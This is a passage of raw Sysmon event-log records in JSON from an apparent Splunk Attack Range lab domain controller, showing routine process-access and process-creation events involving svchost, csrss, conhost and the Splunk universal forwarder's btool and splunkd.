05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2067,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2068,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2069,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2070,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2071,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.828\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-0010DAEA0300}\r\nTargetProcessId: 2524\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.828","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-0010DAEA0300}","TargetProcessId":"2524","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2072,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.846\r\nProcessGuid: {A837DB8D-01C9-5F25-0000-00109BEB0300}\r\nProcessId: 4084\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-01C9-5F25-0000-0010DAEA0300}\r\nParentProcessId: 2524\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.846","ProcessGuid":"{A837DB8D-01C9-5F25-0000-00109BEB0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-01C9-5F25-0000-0010DAEA0300}","ParentProcessId":"2524","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2073,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.844\r\nSourceProcessGUID: {A837DB8D-01C9-5F25-0000-0010DAEA0300}\r\nSourceProcessId: 2524\r\nSourceThreadId: 2612\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-00109BEB0300}\r\nTargetProcessId: 4084\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.844","SourceProcessGUID":"{A837DB8D-01C9-5F25-0000-0010DAEA0300}","SourceProcessId":"2524","SourceThreadId":"2612","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-00109BEB0300}","TargetProcessId":"4084","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2074,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.844\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C9-5F25-0000-00109BEB0300}\r\nTargetProcessId: 4084\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:49.844","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C9-5F25-0000-00109BEB0300}","TargetProcessId":"4084","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2075,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:49.844\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 